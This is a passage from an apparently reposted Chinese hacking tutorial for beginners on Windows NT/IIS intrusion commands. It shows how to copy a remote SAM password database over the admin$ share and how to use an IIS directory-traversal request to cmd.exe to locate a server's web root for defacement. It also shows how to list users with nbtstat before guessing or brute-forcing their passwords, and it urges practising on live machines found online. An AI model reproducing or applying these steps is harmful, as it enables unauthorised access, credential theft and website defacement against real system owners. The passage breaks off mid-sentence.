1. 程式人生 > >菜鳥必練入侵命令 (2)

菜鳥必練入侵命令 (2)

放在x:winntrepairsam._ sam._是資料庫的檔名

  下面就把127.0.0.1的資料庫複製到本地C盤下

  copy 127.0.0.1admin$repairsam._ c:

  ———————-

  6:set

  如果你跑進了一部機子,而且想黑他(這思想只能在特別時候才準有),當然他的80埠要開,不然你黑給誰看。這時需要用SET命令!

  下面是我得到的結果!我來分析它,只是找主頁在那而已。

  COMPUTERNAME=PENTIUMII

  ComSpec=D:WINNTsystem32cmd.exe

  CONTENT_LENGTH=0

  GATEWAY_INTERFACE=CGI/1.1

  HTTP_ACCEPT=*/*

  HTTP_ACCEPT_LANGUAGE=zh-cn

  HTTP_CONNECTION=Keep-Alive

  HTTP_HOST=當前登陸者的IP,這裡本來是顯示我的IP,被我刪除了

  HTTP_ACCEPT_ENCODING=gzip, deflate

  HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 5.0; Windows 98; DigExt)

  NUMBER_OF_PROCESSORS=1

  Os2LibPath=D:WINNTsystem32os2dll;

  OS=Windows_NT

  Path=D:WINNTsystem32;D:WINNT

  PATHEXT=.COM;.EXE;.BAT;.CMD

  PATH_TRANSLATED=E:vlroot主頁放在的地址,只要你看到PATH_TRANSLATED=的後面就是主頁的存放地址。這裡是E:vlroot

  PROCESSOR_ARCHITECTURE=x86

  PROCESSOR_IDENTIFIER=x86 Family 6 Model 3 Stepping 3, GenuineIntel

  PROCESSOR_LEVEL=6

  PROCESSOR_REVISION=0303

  PROMPT=$P$G

  QUERY_STRING=/c+set

  REMOTE_ADDR=XX.XX.XX.XX

  REMOTE_HOST=XX.XX.XX.XX

  REQUEST_METHOD=GET

  script_NAME=/scripts/..%2f../winnt/system32/cmd.exe

  SERVER_NAME=XX.XX.XX.XX

  SERVER_PORT=80

  SERVER_PORT_SECURE=0

  SERVER_PROTOCOL=HTTP/1.1

  SERVER_SOFTWARE=Microsoft-IIS/3.0對方使用IIS/3.0

  SystemDrive=D:

  SystemRoot=D:WINNT

  TZ=GMT-9

  USERPROFILE=D:WINNTProfilesDefault User

  windir=D:WINNT

  粉紅色的那行就是對方主頁存放地址,這裡告訴大家一個技巧,很笨的技巧啊,不過只能用這個方法才能100%的找到主頁的名稱,當你DIR這個目錄時,一定會看到很多檔案,你可以把所有檔案在瀏覽器這樣輸入XX.XX.XX.XX/檔名,這樣只要看到和XX.XX.XX.XX看到的也面一模一樣,那麼這就是主頁的名稱了。

  7:nbtstat

  如果你掃到一部NT的機子,他的136到139其中一個埠開了的話,就要用這個命令得到使用者了。順便告訴大家這是netbios,得到使用者名稱後就可以猜猜密碼了。例如比較簡單的密碼,密碼和使用者名稱一樣的,都試下,不行就暴力破解吧!

  現在網上很多NT的機子都開了這些埠的,你可以練習下,我們來分析得到的結果。

  命令是

  nbtstat -A XX.XX.XX.XX

  -A一定要大寫哦。

  下面是得到的結果。

  NetBIOS Remote Machine Name Table

  Name Type Status

  ———————————————

  Registered Registered Registered Registered Registered Registered Registered Reg

  istered Registered Registered Registered

  MAC Address = 00-E0-29-14-35-BA

  PENTIUMII <00> UNIQUE

  PENTIUMII <20> UNIQUE

  ORAHOTOWN <00> GROUP

  ORAHOTOWN <1C> GROUP

  ORAHOTOWN <1B> UNIQUE

  PENTIUMII <03> UNIQUE

  INet~Services <1C> GROUP

  IS~PENTIUMII…<00> UNIQUE

  ORAHOTOWN <1E> GROUP

  ORAHOTOWN <1D> UNIQUE

  ..__MSBROWSE__.<01> GROUP

  粉紅色的就是登陸過這部系統的使用者,可能你不知道怎麼看,大家是不是看到了一竄數字,只要這竄數字是